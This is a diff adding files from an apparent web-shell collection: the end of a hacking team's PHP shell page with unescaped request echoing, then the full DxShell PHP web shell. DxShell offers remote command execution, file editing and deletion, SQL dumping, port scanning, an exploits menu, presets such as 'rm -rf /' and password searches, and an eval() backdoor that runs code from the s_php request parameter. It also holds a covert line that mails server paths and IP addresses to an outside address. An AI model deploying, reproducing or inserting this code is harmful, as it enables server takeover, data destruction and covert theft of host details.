+  <b><font face="Tahoma" color="#C0C0C0">Rows:</font><font face="Tahoma" color="#0000FF" size="2"> </font></b> 
+  <input type="text" name="rows" value="<?php echo $_REQUEST['rows'] ?>" size="5" /></p>
+<p class="prompt" align="center">
+  <b><font color="#C0C0C0" face="SimSun">Edited By Emperor Hacking Team</font></b></p>
+<p class="prompt" align="center">
+  <font face="Tahoma" size="2" color="#808080">iM4n - FarHad - imm02tal - R$P</font><font color="#808080"><br>
+&nbsp;</font></p>
+</div>
+</form>
+
+
+<p class="prompt" align="center">
+  <b><font color="#000000">&nbsp;</font><font color="#000000" size="2"> </font>
+  </b></p>
+
+
+
+</html>
\ No newline at end of file
diff --git a/138shell/D/Dx.php.txt b/138shell/D/Dx.php.txt
new file mode 100644
index 0000000..ebca7b5
--- /dev/null
+++ b/138shell/D/Dx.php.txt
@@ -0,0 +1,2026 @@
+<?php
+
+/*
+  DDDDD        SSSSS    DxShell    by î_Î Tync
+   D  D  X X   S
+   D  D   X    SSSSS    http://hellknights.void.ru/
+   D  D  X X       S    ICQ#244648
+  DDDDD        SSSSS
+*/
+
+$GLOB['SHELL']['Ver']='1.0b'; /* ver of the shell */
+$GLOB['SHELL']['Date']='26.04.2006';
+
+if (headers_sent()) $DXGLOBALSHIT=true; else $DXGLOBALSHIT=FALSE; /* This means if bug.php has fucked up the output and headers are already sent =(( lot's of things become HARDER */
+@ob_clean();
+$DX_Header_drawn=false;
+
+###################################################################################
+####################++++++++++++# C O M M O N #++++++++++++++++####################
+###################################################################################
+@set_magic_quotes_runtime(0);
+@ini_set('max_execution_time',0);
+@set_time_limit(0);
+@ini_set('output_buffering',0);
+@error_reporting(E_ALL);
+
+$GLOB['URL']['+Get']=$_SERVER['PHP_SELF'].'?'; /* this filename + $_GET string */
+	if (!empty($_GET))
+		for ($i=0, $INDEXES=array_keys($_GET), $COUNT=count($INDEXES); 	$i<$COUNT; $i++)
+			$GLOB['URL']['+Get'].=$INDEXES[$i].='='.$_GET[ $INDEXES[$i] ].( ($i==($COUNT-1))?'':'&' );
+$GLOB['PHP']['SafeMode']=(bool)ini_get('safe_mode');
+$GLOB['PHP']['upload_max_filesize']=((integer)str_replace(array('K', 'M'), array('000', '000000'), ini_get('upload_max_filesize')));
+
+if (get_magic_quotes_gpc()==1)
+	{ /* slashes killah */
+	for ($i=0, $INDEXES=array_keys($_GET), 	$COUNT=count($INDEXES); 	$i<$COUNT; $i++)
+	{$_GET[ $INDEXES[$i] ]	 = stripslashes($_GET[ $INDEXES[$i] ]); }
+	for ($i=0, $INDEXES=array_keys($_POST), 	$COUNT=count($INDEXES); 	$i<$COUNT; $i++)
+	{if (is_array($_POST[ $INDEXES[$i] ])) continue; $_POST[ $INDEXES[$i] ] = stripslashes($_POST[ $INDEXES[$i] ]);  }
+	/*for ($i=0, $INDEXES=array_keys($_SERVER),  $COUNT=count($INDEXES); 	$i<$COUNT; $i++) {$_SERVER[ $INDEXES[$i] ]= stripslashes($_SERVER[ $INDEXES[$i] ]);     }*/
+	for ($i=0, $INDEXES=array_keys($_COOKIE),  $COUNT=count($INDEXES); 	$i<$COUNT; $i++)
+	{$_COOKIE[ $INDEXES[$i] ]= stripslashes($_COOKIE[ $INDEXES[$i] ]); }
+	}
+
+$GLOB['FILES']['CurDIR']=getcwd();
+
+$GLOB['SYS']['GZIP']['CanUse']=$GLOB['SYS']['GZIP']['CanOutput']=false;
+if (isset($_GET['dx_gzip']) OR isset($_POST['dx_gzip']))
+	{	$GLOB['SYS']['GZIP']['CanUse']=extension_loaded("zlib");
+	if (extension_loaded("zlib"))
+		if (!(strpos($_SERVER['HTTP_ACCEPT_ENCODING'], 'gzip')===FALSE))
+			$GLOB['SYS']['GZIP']['CanOutput']=TRUE;
+	};
+$GLOB['SYS']['GZIP']['IMG']=extension_loaded("zlib");
+
+$GLOB['SYS']['OS']['id']=($GLOB['FILES']['CurDIR'][1]==':')?'Win':'Nix';
+$GLOB['SYS']['OS']['Full']=getenv('OS');
+if (empty($GLOB['SYS']['OS']['Full']))
+	{
+	$GLOB['SYS']['OS']['id'] = getenv('OS');
+	if(empty($GLOB['SYS']['OS']['id'])){ $GLOB['SYS']['OS']['id'] = php_uname(); }
+	if(empty($GLOB['SYS']['OS']['id'])){ $GLOB['SYS']['OS']['id'] ='???';}
+	else {if(@eregi("^win",$GLOB['SYS']['OS']['id'])) $GLOB['SYS']['OS']['id']='Win'; else $GLOB['SYS']['OS']['id']='Nix';}
+	}
+
+
+$GLOB['DxMODES']=array(
+	'WTF'		=>	'AboutBox',
+
+	'DIR'		=>	'Dir browse',
+	'UPL'		=>	'Upload file',
+	'FTP'		=>	'FTP Actions',
+
+	'F_CHM'		=>	'File CHMOD',
+	'F_VIEW'	=>	'File viewer',
+	'F_ED'		=>	'File Edit',
+	'F_DEL'		=>	'File Delete',
+	'F_REN'		=>	'File Rename',
+	'F_COP'		=>	'File Copy',
+	'F_MOV'		=>	'File Move',
+	'F_DWN'		=>	'File Download',
+
+	'SQL'		=>	'SQL Maintenance',
+	'SQLS'		=>	'SQL Search',
+	'SQLD'		=>	'SQL Dump',
+	'PHP'		=>	'PHP C0nsole',
+	'COOK'		=>	'Cookies Maintenance',
+	'CMD'		=>	'C0mmand line',
+
+	'MAIL'		=>	'Mail functions',
+	'STR'		=>	'String functions',
+	'PRT'		=>	'Port scaner',
+	'SOCK'		=>	'Raw s0cket',
+	'PROX'		=>	'HTTP PROXY',
+	'XPL'		=>	'Expl0its',
+	'XSS'		=>	'XSS Server',
+	);
+$GLOB['DxGET_Vars']=array(/* GET variables used by shell */
+'dxinstant', 'dxmode', 'dximg', 'dxparam', 'dxval', 'dx_ok', 'dx_gzip',
+'dxdir', 'dxdirsimple', 'dxfile',
+'dxsql_s', 'dxsql_l', 'dxsql_p', 'dxsql_d','dxsql_q',
+);
+
+$GLOB['VAR']['PHP']['Presets']=array(
+	/* Note, that no comments are allowed in the code */
+	'phpinfo'	=>	'phpinfo();',
+	'GLOBALS'	=>	'print \'<plaintext>\'; print_r($GLOBALS);',
+	'php_ini'	=>	'$INI=ini_get_all(); '
+		."\n".'print \'<table border=0><tr>\''
+		."\n\t".'.\'<td class="listing"><font class="highlight_txt">Param</td>\''
+		."\n\t".'.\'<td class="listing"><font class="highlight_txt">Global value</td>\''
+		."\n\t".'.\'<td class="listing"><font class="highlight_txt">Local Value</td>\''
+		."\n\t".'.\'<td class="listing"><font class="highlight_txt">Access</td></tr>\';'
+		."\n".'foreach ($INI as $param => $values) '
+		."\n\t".'print "\n".\'<tr>\''
+		."\n\t\t".'.\'<td class="listing"><b>\'.$param.\'</td>\''
+		."\n\t\t".'.\'<td class="listing">\'.$values[\'global_value\'].\' </td>\''
+		."\n\t\t".'.\'<td class="listing">\'.$values[\'local_value\'].\' </td>\''
+		."\n\t\t".'.\'<td class="listing">\'.$values[\'access\'].\' </td></tr>\';',
+	'extensions'	=>	'$EXT=get_loaded_extensions ();'
+		."\n".'print \'<table border=0><tr><td class="listing">\''
+		."\n\t".'.implode(\'</td></tr>\'."\n".\'<tr><td class="listing">\', $EXT)'
+		."\n\t".'.\'</td></tr></table>\''
+		."\n\t".'.count($EXT).\' extensions loaded\';',
+	);
+$GLOB['VAR']['CMD']['Presets']=array(
+	'Call Nik8 with an axe'=>'[w0rning] rm -rf /',
+	'show opened ports'=>'netstat -an | grep -i listen',
+	'find config* files'=>'find / -type f -name "config*"',
+	'find all *.php files with word "password"'=>'find / -name *.php | xargs grep -li password',
+	'find all writable directories and files'=>'find / -perm -2 -ls',
+	'list file attribs on a second extended FS'=>'lsattr -va',
+	'View syslog.conf'=>'cat /etc/syslog.conf',
+	'View Message of the day'=>'cat /etc/motd',
+	'View hosts'=>'cat /etc/hosts',
+	'List processes'=>'ps auxw',
+	'List user processes'=>'ps ux',
+	'Locate httpd.conf'=>'locate httpd.conf',
+	'Interfaces'=>'ifconfig',
+	'CPU'=>'/proc/cpuinfo',
+	'RAM'=>'free -m',
+	'HDD'=>'df -h',
+	'OS Ver'=>'sysctl -a | grep version',
+	'Kernel ver' =>'cat /proc/version',
+	'Is cURL installed? ' => 'which curl',
+	'Is wGET installed? ' => 'which wget',
+	'Is lynx installed? ' => 'which lynx',
+	'Is links installed? ' => 'which links',
+	'Is fetch installed? ' => 'which fetch',
+	'Is GET installed? ' => 'which GET',
+	'Is perl installed? ' => 'which perl',
+	'Where is apache ' => 'whereis apache',
+	'Where is perl ' => 'whereis perl',
+	'Pack directory' =>'"tar -zc /path/ -f name.tar.gz"',
+	);
+
+
+###################################################################################
+####################+++++++++# F U N C T I O N S #+++++++++++++####################
+###################################################################################
+function DxError($errstr)
+{global $DX_Header_drawn;print "\n\n".'<table border=0 cellspacing=0 cellpadding=2><tr>'
+	.'<td class=error '.((!$DX_Header_drawn)?'style="color:#000000; background-color: #FF0000; font-weight: bold; font-size: 11pt;position:absolute;top=0;left=0;"':'').'>'
+	.'Err: '.$errstr.'</td></tr></table>'."\n\n"; return '';}
+
+function DxWarning($warn)
+{print "\n\n".'<table border=0 cellspacing=0 cellpadding=2><tr><td class=warning><b>W0rning:</b> '.$warn.'</td></tr></table>'."\n\n"; return '';}
+
+function DxImg($imgname)
+{
+global $DXGLOBALSHIT;
+if ($DXGLOBALSHIT) return '<font class="img_replacer">'.$imgname.'</font>'; /* globalshit doesn't give a chance for our images to survive */
+return '<img src="'.DxURL('kill', '').'&dxmode=IMG&dximg='.$imgname.'" title="'.$imgname.'" alt"'.$imgname.'">';
+}
+
+function DxSetCookie($name, $val, $exp)
+{
+if (!headers_sent()) return setcookie($name, $val, $exp, '/');
+?>
+<script>
+var curCookie = "<?=$name;?>=" + escape("<?=$val;?>") +"; expires=<?=date('l, d-M-y H:i:s', $exp);?> GMT; path=/;";
+document.cookie = curCookie;
+</script>
+<?
+}
+
+function DxRandom($range='48-57,65-90,97-122')
+{
+$range=explode(',',$range);
+$range=explode('-',	$range[  rand(0,count($range)-1)  ]   );
+return rand($range[0],$range[1]);
+}
+
+function DxRandomChars($num)
+{
+$ret='';
+for ($i=0;$i<$num;$i++) $ret.=chr(DxRandom('48-57,65-90,97-122'));
+return $ret;
+}
+
+function DxZeroedNumber($int, $totaldigits)
+{
+$str=(string)$int;
+while (strlen($str)<$totaldigits) $str='0'.$str;
+return $str;
+}
+
+function DxPrint_ParamState($name, $state, $invert=false)
+{
+print $name.' : '; $invert=(bool)$invert;
+if (is_bool($state))
+		 print ($state)?'<font color=#'.(($invert)?'FF0000':'00FF00').'><b>ON</b></font>':'<font color=#'.(($invert)?'00FF00':'FF0000').'><b>OFF</b></font>';
+	else print '<b>'.$state.'</b>';
+}
+
+function DxStr_FmtFileSize($size)
+{
+	if($size>= 1073741824)  {$size = round($size / 1073741824 * 100) / 100 . " GB";	}
+elseif($size>= 1048576) 	{$size = round($size / 1048576 * 100) / 100 . " MB";	}
+elseif($size>= 1024) 		{$size = round($size / 1024 * 100) / 100 . " KB";		}
+					   else {$size = $size . " B";}
+return $size;
+}
+
+function DxDate($UNIX) {return date('d.M\'Y H:i:s', $UNIX); }
+
+function DxDesign_DrawBubbleBox($header, $body, $width)
+{
+$header=str_replace(array('"',"'","`"), array('&#x02DD;','&#x0027;',''), $header);
+$body=str_replace(array('"',"'","`"), array('&#x02DD;','&#x0027;',''), $body);
+return ' onmouseover=\'showwin("'.$header.'","'.$body.'",'.$width.',1)\' onmouseout=\'showwin("","",0,0)\' onmousemove=\'movewin()\' ';
+}
+
+function DxChmod_Str2Oct($str)   /*  rwxrwxrwx => 0777 */
+{
+$str = str_pad($str,9,'-');
+$str=strtr($str,	array('-'=>'0','r'=>'4','w'=>'2','x'=>'1')		);
+$newmode='';
+for ($i=0; $i<3; $i++) $newmode .= $str[$i*3]+$str[$i*3+1]+$str[$i*3+2];
+
+return $newmode;
+}
+
+function DxChmod_Oct2Str($perms) /* 777 => rwxrwxrwx. USE ONLY STRING REPRESENTATION OF $oct !!!! */
+{
+$info='';
+if (($perms & 0xC000) == 0xC000) $info = 'S'; /*  Socket */
+	elseif (($perms & 0xA000) == 0xA000) $info = 'L'; /* Symbolic Link */
+elseif (($perms & 0x8000) == 0x8000) $info = '&nbsp;'; /* '-'*//* Regular */
+elseif (($perms & 0x6000) == 0x6000) $info = 'B';  /* Block special */
+elseif (($perms & 0x4000) == 0x4000) $info = 'D'; /* Directory*/
+elseif (($perms & 0x2000) == 0x2000) $info = 'C'; /* Character special*/
+elseif (($perms & 0x1000) == 0x1000) $info = 'P'; /* FIFO pipe*/
+else $info = '?'; /* Unknown */
+if (!empty($info)) $info='<font class=rwx_sticky_bit>'.$info.'</font>';
+/* Owner */
+$info .= (($perms & 0x0100) ? 'r' : '-');
+$info .= (($perms & 0x0080) ? 'w' : '-');
+$info .= (($perms & 0x0040) ?
+		(($perms & 0x0800) ? 's' : 'x' ) :
+		(($perms & 0x0800) ? 'S' : '-'));
+$info .= '/';
+/* Group */
+$info .= (($perms & 0x0020) ? 'r' : '-');
+$info .= (($perms & 0x0010) ? 'w' : '-');
+$info .= (($perms & 0x0008) ?
+		(($perms & 0x0400) ? 's' : 'x' ) :
+		(($perms & 0x0400) ? 'S' : '-'));
+$info .= '/';
+/* World */
+$info .= (($perms & 0x0004) ? 'r' : '-');
+$info .= (($perms & 0x0002) ? 'w' : '-');
+$info .= (($perms & 0x0001) ?
+		(($perms & 0x0200) ? 't' : 'x' ) :
+		(($perms & 0x0200) ? 'T' : '-'));
+
+ return $info;
+}
+
+function DxFileToUrl($filename)
+{/* kills & and = to be okay in URL */
+return str_replace(array('&','=','\\'), array('%26', '%3D','/'), $filename);
+}
+$ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
+function DxFileOkaySlashes($filename)
+{return str_replace('\\', '/', $filename);}
+
+function DxURL($do='kill', $these='') /* kill: '' - kill all ours, 'a,b,c' - kill $a,$b,$c ; leave: '' - as is, leave 'a,b,c' - leave only $a,$b,$c */
+{
+global $GLOB;
+if ($these=='') $these=$GLOB['DxGET_Vars']; else $these=explode(',', $these);
+
+$ret=$_SERVER['PHP_SELF'].'?';
+if (!empty($_GET))
+	for ($i=0, $INDEXES=array_keys($_GET), $COUNT=count($INDEXES); 	$i<$COUNT; $i++)
+		if ( !in_array($INDEXES[$i], $GLOB['DxGET_Vars']) OR ( /* if not ours - add */
+			($do=='kill' AND !in_array($INDEXES[$i], $these))
+			OR
+			($do=='leave' AND in_array($INDEXES[$i], $these))
+			 ))
+			$ret.=$INDEXES[$i].='='.$_GET[ $INDEXES[$i] ].( ($i==($COUNT-1))?'':'&' );
+if (substr($ret, -1,1)=='&') $ret=substr($ret, 0, strlen($ret)-1);
+return $ret;
+}
+
+function DxGETinForm($do='kill', $these='') /* Equal to DxURL(), but prints out $_GET as form <input type=hidden> params */
+{
+$link=substr(strchr(DxURL($do, $these), '?'), 1);
+$link=explode('&', $link);
+print "\n".'<!--$_GET;-->';
+for ($i=0, $COUNT=count($link); $i<$COUNT; $i++)
+	{
+	$cur=explode('=', $link[$i]);
+	print '<input type=hidden name="'.str_replace('"', '&quot;', $cur[0]).'" value="'.str_replace('"', '&quot;', $cur[1]).'">';
+	}
+}
+
+function DxGotoURL($URL, $noheaders=false)
+{
+if ($noheaders or headers_sent())
+	{
+	print "\n".'<div align=center>Redirecting...<br><a href="'.$URL.'">Press here in shit happens</a>';
+	print '<script>location="'.$URL.'";</script>';
+	/* print $str.='<META HTTP-EQUIV="Refresh" Content="1, URL='.$URL.'">'; */
+	}
+	else
+	header('Location: '.$URL);
+return 1;
+}
+
+if (!function_exists('mime_content_type'))
+	{
+	if ($GLOB['SYS']['OS']['id']!='Win')
+		{	function mime_content_type($f)
+			{
+			$f = escapeshellarg($f);
+			return trim(`file -bi `.$f);
+			}
+			}
+		else
+		{
+			function mime_content_type($f) {return 'Content-type: text/plain';} /* Nothing alike under win =( if u have some thoughts - touch me */
+		}
+	}
+
+
+function DxMySQL_FetchResult($MySQL_res, &$MySQL_Return_Array, $idmode=false) /* Fetches mysql return array (associative) */
+{
+$MySQL_Return_Array=array();
+
+if ($MySQL_res===false) return 0;
+if ($MySQL_res===true)	return 0;
+
+$ret=mysql_num_rows($MySQL_res); if ($ret<=0) return 0;
+
+if ($idmode) while (!(($MySQL_Return_Array[]=mysql_fetch_array($MySQL_res, MYSQL_NUM))===FALSE)) {}
+	else	 while (!(($MySQL_Return_Array[]=mysql_fetch_array($MySQL_res, MYSQL_ASSOC))===FALSE)) {}
+array_pop($MySQL_Return_Array);
+
+for ($i=0; $i<count($MySQL_Return_Array); $i++) /* Kill the fucking slashes */
+	{
+	if ($i==0)
+		{
+		$INDEXES=array_keys($MySQL_Return_Array[$i]);
+		$count=count($INDEXES);
+		}
+	for ($j=0; $j<$count; $j++)
+		{
+		$key=&$INDEXES[$j];
+		$val=&$MySQL_Return_Array[$i][$key];
+		if (is_string($val)) $val=stripcslashes($val);
+		}
+	}
+return $ret;
+}
+
+function DxMySQLQ($query, $die_on_err)
+{
+$q=mysql_query($query);
+if (mysql_errno()!=0)
+	{
+	DxError('" '.$query.' "'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error());
+	if ($die_on_err) die();
+	}
+return $q;
+}
+
+function DxDecorVar(&$var, $htmlstr)
+{
+if (is_null($var)) return 'NULL';
+if (!isset($var)) return '[!isset]';
+
+if (is_bool($var))		return ($var)?'true':'false';
+if (is_int($var))   	return (int)$var;
+if (is_float($var)) 	return number_format($var, 4, '.', '');
+if (is_string($var))
+	{
+	if (empty($var)) return '&nbsp;';
+	if (!$htmlstr)	return ''.($var).'';
+			   else return ''.str_replace("\n", "<br>", str_replace("\r","", htmlspecialchars($var))).'';
+	}
+if (is_array($var))		return '(ARR)'.var_export($var, true).'(/ARR)';
+if (is_object($var))	return '(OBJ)'.var_export($var, true).'(/OBJ)';
+if (is_resource($var))	return '(RES:'.get_resource_type($var).')'.var_export($var, true).'(/RES)';
+return '(???)'.var_export($var, true).'(/???)';
+}
+
+function DxHTTPMakeHeaders($method='', $URL='', $host='', $user_agent='', $referer='', $posts=array(), $cookie=array())
+{
+if (!empty($posts))
+	{
+	$postValues='';
+	foreach( $posts AS $name => $value ) {$postValues .= urlencode( $name ) . "=" . urlencode( $value ) . '&';}
+	$postValues = substr( $postValues, 0, -1 );
+	$method = 'POST';
+	} else $postValues = '';
+
+ if (!empty($cookie))
+	{
+	$cookieValues='';
+	foreach( $cookie AS $name => $value ) {$cookieValues .= urlencode( $name ) . "=" . urlencode( $value ) . ';';}
+	$cookieValues = substr( $cookieValues, 0, -1 );
+	} else $cookieValues = '';
+
+$request  = $method.' '.$URL.' HTTP/1.1'."\r\n";
+if (!empty($host))			$request .= 'Host: '.$host."\r\n";
+if (!empty($cookieValues))	$request .='Cookie: '.$cookieValues."\r\n";
+if (!empty($user_agent))	$request .= 'User-Agent: '.$user_agent.' '."\r\n";
+$request .= 'Connection: Close'."\r\n"; /* Or connection will be endless */
+if (!empty($referer))		$request .= 'Referer: '.$referer."\r\n";
+if ( $method == 'POST' )
+	{
+	$lenght = strlen( $postValues );
+	$request .= 'Content-Type: application/x-www-form-urlencoded'."\r\n";
+	$request .= 'Content-Length: '.$lenght."\r\n";
+	$request .= "\r\n";
+	$request .= $postValues;
+	}
+$request.="\r\n\r\n";
+return $request;
+}
+
+function DxFiles_UploadHere($path, $filename, &$contents)
+{if (empty($contents)) die(DxError('Received empty'));
+$filename='__DxS__UPLOAD__'.DxRandomChars(3).'__'.$filename;
+if (!($f=fopen($path.$filename, 'w')))
+	{
+	$path='/tmp/';
+	if (!($f=fopen($path.$filename, 'w')))
+		die(DxError('Writing denied. Save to "'.$path.$filename.'" also failed! =('));
+		else
+		DxWarning('Writing failed, but saved to "'.$path.$filename.'"! =)');
+	}
+fputs($f, $contents);
+fclose($f);
+print "\n".'Saved file to "'.$path.$filename.'" - OK';
+print "\n".'<br><a href="'.DxURL('kill', '').'&dxmode=DIR&dxdir='.DxFileToUrl(dirname($path)).'">[Go DIR]</a>';;
+}
+
+function DxExecNahuj($cmd, &$OUT, &$RET) /* returns the name of function that exists, or FALSE */
+{
+$OUT=array(); $RET='';
+if (function_exists('exec'))
+	{	if (!empty($cmd)) exec($cmd, $OUT, $RET); /* full array output */
+	return array(true,true,'exec', '');
+	}
+	elseif  (function_exists('shell_exec'))
+	{	if (!empty($cmd)) $OUT[0]=shell_exec($cmd); /* full string output, no RETURN */
+	return array(true,false,'shell_exec', '<s>exec</s> shell_exec');
+	}
+	elseif  (function_exists('system'))
+	{	if (!empty($cmd)) $OUT[0]=system($cmd, $RET); /* last line of output */
+	return array(true,false,'system', '<s>exec</s> <s>shell_exec</s> system<br>Only last line of output is available, sorry =(');
+	}
+	else return array(FALSE, FALSE, '&lt;noone&gt;', '<s>exec</s> <s>shell_exec</s> <s>system</s> Bitchy admin has disabled command line!! =(');;
+}
+
+###################################################################################
+#####################++++++++++++# L O G I N #++++++++++++++++#####################
+###################################################################################
+if (   isset($_GET['dxmode'])?$_GET['dxmode']=='IMG':false   )
+	{ /* IMGS are allowed without passwd =) */	$GLOB['SHELL']['USER']['Login']='';
+	$GLOB['SHELL']['USER']['Passw']='';
+	}
+
+if (	isset($_GET['dxinstant'])?$_GET['dxinstant']=='logoff':false   )
+	{
+	if ($DXGLOBALSHIT)
+		{		if (isset($_COOKIE['DxS_AuthC'])) DxSetCookie('DxS_AuthC','---', 1);
+		}
+		else
+		{
+		header('WWW-Authenticate: Basic realm="==== HIT CANCEL OR PRESS ESC ===='.base_convert(crc32(mt_rand(0, time())),10,36).'"');		header('HTTP/1.0 401 Unauthorized');
+		}
+
+	print '<html>Redirecting... press <a href="'.DxURL('kill','').'">here if shit happens</a>';
+	DxGotoURL(DxURL('kill',''), '1noheaders');
+	die();
+	}
+
+if (((strlen($GLOB['SHELL']['USER']['Login'])+strlen($GLOB['SHELL']['USER']['Passw']))>=2))
+	{	if ($DXGLOBALSHIT)
+		{		if (isset($_POST['DxS_Auth']) or isset($_COOKIE['DxS_AuthC']))
+			{			if (!(
+
+				((@$_POST['DxS_Auth']['L']==$GLOB['SHELL']['USER']['Login']) AND /* form */
+				(@$_POST['DxS_Auth']['P']==$GLOB['SHELL']['USER']['Passw']
+							OR
+				(strlen($GLOB['SHELL']['USER']['Passw'])==32 AND @$_POST['DxS_Auth']['P']==md5($GLOB['SHELL']['USER']['Passw']))
+				))
+						OR
+				@$_COOKIE['DxS_AuthC']==md5($GLOB['SHELL']['USER']['Login'].$GLOB['SHELL']['USER']['Passw']) /* cookie */
+
+				))
+				{print(DxError('Fucked off brutally'));unset($_POST['DxS_Auth'], $_COOKIE['DxS_AuthC']);}
+				else DxSetCookie('DxS_AuthC', md5($GLOB['SHELL']['USER']['Login'].$GLOB['SHELL']['USER']['Passw']), time()+60*60*24*2);
+				}
+		if (!isset($_POST['DxS_Auth']) AND !isset($_COOKIE['DxS_AuthC']))
+			{
+			print "\n".'<form action="'.DxURL('kill', '').'" method=POST style="position:absolute;z-index:100;top:0pt;left:40%;width:100%;height:100%;">';
+			print "\n".'<br><input type=text name="DxS_Auth[L]" value="<LOGIN>" 	onfocus="this.value=\'\'"  style="width:200pt">';
+			print "\n".'<br><input type=text name="DxS_Auth[P]" value="<PASSWORD>" 	onfocus="this.value=\'\'"  style="width:200pt">';
+			print "\n".'<br><input type=submit value="Ok" style="width:200pt;"></form>';
+			print "\n".'</form>';
+			die();
+			}
+		}
+		else
+		{
+		if (!isset($_SERVER['PHP_AUTH_USER']))
+			{
+			header('WWW-Authenticate: Basic realm="DxShell '.$GLOB['SHELL']['Ver'].' Auth"');
+			header('HTTP/1.0 401 Unauthorized');
+			/* Result if user hits cancel button */
+			unset($_GET['dxinstant']);
+			die(DxError('Fucked off brutally'));
+			}
+			else
+			if (!(	$_SERVER['PHP_AUTH_USER']==$GLOB['SHELL']['USER']['Login']
+			AND (
+					$_SERVER['PHP_AUTH_PW']==$GLOB['SHELL']['USER']['Passw']
+								OR
+					(strlen($GLOB['SHELL']['USER']['Passw'])==32 AND md5($_SERVER['PHP_AUTH_PW'])==$GLOB['SHELL']['USER']['Passw'])
+					)
+					))
+			{
+			header('WWW-Authenticate: Basic realm="DxS '.$GLOB['SHELL']['Ver'].' Auth: Fucked off brutally"');
+			header('HTTP/1.0 401 Unauthorized');
+			/* Result if user hits cancel button */
+			unset($_GET['dxinstant']);
+			die(DxError('Fucked off brutally'));
+			}
+		}
+	}
+
+###################################################################################
+####################++++++# I N S T A N T    U S A G E #+++++++####################
+###################################################################################
+if (!isset($_GET['dxmode'])) $_GET['dxmode']='DIR'; else $_GET['dxmode']=strtoupper($_GET['dxmode']);
+if ($_GET['dxmode']=='DDOS') /* DDOS mode. In other case, EVALer of everything that comes in $_GET['s_php'] OR $_POST['s_php']  */
+	{
+	$F = $_GET + $_POST;
+	if (!isset($F['s_php'])) die('o_O Tync DDOS Remote Shell '.$GLOB['SHELL']['Ver']."\n".'<br>Use GET or POST to set "s_php" variable with code to be executed =)<br>Enjoy!');
+	eval(stripslashes($F['s_php']));
+	die("\n\n".'<br><br>'.'o_O Tync DDOS Web Shell '.$GLOB['SHELL']['Ver'].((!isset($F['s_php']))?"\n".'<br>'.'$s_php is responsible for php-code-injection':''));
+	}
+if ($_GET['dxmode']=='IMG')
+	{
+	$IMGS=array(
+		'DxS'	=> 'R0lGODlhEAAQAIAAAAD/AAAAACwAAAAAEAAQAAACL4yPGcCs2NqLboGFaXW3X/tx2WcZm0luIcqFKyuVHRSLJOhmGI4mWqQAUoKPYqIAADs=',
+		'folder'=> 'R0lGODlhDwAMAJEAAP7rhriFIP///wAAACH5BAEAAAIALAAAAAAPAAwAAAIklIJhywcPVDMBwpSo3U/WiIVJxG0IWV7Vl4Joe7Jp3HaHKAoFADs=',
+		'foldup'=> 'R0lGODlhDwAMAJEAAP7rhriFIAAAAP///yH5BAEAAAMALAAAAAAPAAwAAAIw3IJiywcgRGgrvCgA2tNh/Dxd8JUcApWgaJFqxGpp+GntFV4ZauV5xPP5JIeTcVIAADs=',
+		'view'	=> 'R0lGODlhEAAJAJEAAP///wAAAP///wAAACH5BAEAAAIALAAAAAAQAAkAAAIglB8Zx6aQYGIRyCpFsFY9jl1ft4Fe2WmoZ1LROzWIIhcAOw==',
+		'del'	=> 'R0lGODlhEAAQAKIAAIoRGNYnOtclPv///////wAAAAAAAAAAACH5BAEAAAQALAAAAAAQABAAAANASArazQ4MGOcLwb6BGQBYBknhR3zhRHYUKmQc65xgKM+0beKn3fErm2bDqomIRaMluENhlrcFaEejPKgL3qmRAAA7',
+		'copy'	=> 'R0lGODlhEAAQAKIAAP//lv///3p6egAAAP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAQABAAAAM+SKrT7isOQGsII7Jq7/sTdWEh53FAgwLjILxp2WGculIurL68XsuonCAG6PFSvxvuuDMOQcCaZuJ8TqGQSAIAOw==',
+		'move'	=> 'R0lGODlhEAAQAJEAADyFFLniPu79wP///yH5BAEAAAMALAAAAAAQABAAAAI3nD8AyAgiVnMihDidldmAnXFfIB6Pomwo9kCu5bqpRdf18qGjTpom6AkBO4lhqHLhCHtEj/JQAAA7',
+		'exec'	=> 'R0lGODlhoQFLAKIAADc2NX98exkYGFxZWaOengEBAQAAAAAAACwAAAAAoQFLAAAD/1i63P4wykmrvTjrzbv/YCiOpCcMAqCuqhCAgCDPM1AEKQsM8SsXAuAviNOtXJQYrXYCmh5BRWA3qFp5rwlqSRtMTrnWMSuZGlvkjpIrs0mipbh8nnFD4B08VGKP6Bt/DoELgyR9Dod7fklvjIsfhU50k5SVFjY/C26RFoVBmGxNi6BKCp8UUXpBmXReNTsxBV5fkoSrjDNOKQWJiEJsvRmRnJbFxoYMq7HBGJ68Qrozs3xAKr60fswiXipWpdOLf7cTfVHLuIKiT4/H7e7IydbPkKO60CngEDY7q7faphJQUJpiJcCWIPkU3XFkSobAf89S/doBYti7ixjVNOCnAP8iqnpLgFTRdqrKA4ieEpYQQGCAwSo0ZH1kFyGRPIigNvKo2Cijz5/k4tnxiK3mvY48cMKy1ZGhIJUkWLqEGRNqsp7UAII5FTTXqpE8aQIdO9YOPn9h94BSBhOiFVXzsAKiSIlAAINrnFglJFdfPIFxjUrEt5OeWLKIMcI5AY5oI1Z8Mf2yEhjCS75OUOorPKmlQS4yiyYbR83cTq6lo410fPgqscSw5wzlAYf1nRx+GVDZpwVvzB+aH9Be6aDlwaozCS0ltnhpU9FIk6Y9KS+29WKuGK9R1+FKv1xbYgC4+zkNHsKABaGjAUvyQgyJPucu3abKlF2LstsHT+HFkfH/d41Xywab9EMFDtcleAwVUVHBWTYMflFFS+KxIEMa7+n0WjOJGHeFNxi+4WB6RTl31QXdkCgCerFsqOCLDtC2hHg3jEfAjR8WcQY/5PV41412AeljgD0CeeOQQwppWwM4vGTfjeOFYUQKVIbiwgqrodGfS0i+8KORR95l5S5TfPmSQTqe4aWPRoppRjdw+sfFCjeQB6ZdIcKoZ3J+udTSRgPGKAiAaIqpyAkv/bNDABQOaI5T0UXUGiCawNXPaKFFUJCPNuTZgCv29eGeZbVxiYIPkwJEEJd3bZGFi3u+eKk9RB